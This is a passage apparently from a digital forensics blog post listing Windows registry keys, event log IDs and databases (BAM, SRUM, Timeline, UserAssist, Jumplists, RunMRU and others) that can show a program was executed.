Applicable to Windows XP/Server 2003 only, this artifact is located in the System Registry Hive, these keys can evidence the running of executables which are installed as a service.


Microsoft-Windows-Application-Experience Program-Inventory / Telemetry

Both of these system logs are related to the Application Experience and Compatibility features implemented in modern versions of Windows.

At the time of testing I find none of my desktop systems have the Inventory log populated, while the Telemetry log seems to contain useful information. I have however seen various discussion online indicating that the Inventory log is populated in Windows 10. It is likely that my disabling of all tracking and reporting functions on my personal systems and VMs may be the cause… more testing required.


Background Activity Monitor (BAM)

The Background Activity Monitor (BAM) and (DAM) registry keys within the SYSTEM registry hive, however as it records them under the SID of the associated user it is user attributable. The key details  the path of executable files that have been executed and last execution date/time

It was introduced to Windows 10 in 1709 (Fall Creators update).


System Resource Usage Monitor (SRUM)

Introduced in Windows 8, this Windows features maintains a record of all sorts of interesting information concerning applications and can be used to determine when applications were running.



In Windows 10 1803 (April 2018) Update, Microsoft introduced the Timeline feature, and all forensicators did rejoice. This artifact is a goldmine for user activity analysis and the associated data is stored within an ActivitiesCache.db located within each users profile.


Security Log (592/4688)

Event IDs 592 (Windows XP/2003) and 4688 (everything since) are recorded within the Security log on process creation, but only if Audit Process Creation is enabled.


System Log (7035)

Event ID 7035 within the System event log is recorded by the Service Control Manager when a Service starts or stops. As such it can be an indication of execution if the associated process is registered as a service.



Within each users NTUSER.DAT the UserAssist key tracks execution of GUI applications.



The RecentApps key is located in the NTUSER.DAT associated with each user and contains a record of their… Recent Applications. The presence of keys associated with a particular executable evidence the fact that this user ran the executable.



Implemented in Windows 7, Jumplists are a mechanism by which Windows records and presents recent documents and applications to users. Located within individual users profiles the presence of references to executable(s) within the ‘Recent\AutomaticDestinations’ can be used to evidence the fact that they were run by the user.



The RunMRU is a list of all commands typed into the Run box on the Start menu and is recorded within the NTUSER.DAT associated with each user. Commands referencing executables can be used to determine if, how and when the executable was run and which user account was associated with running it.


AppCompatFlags Registry Keys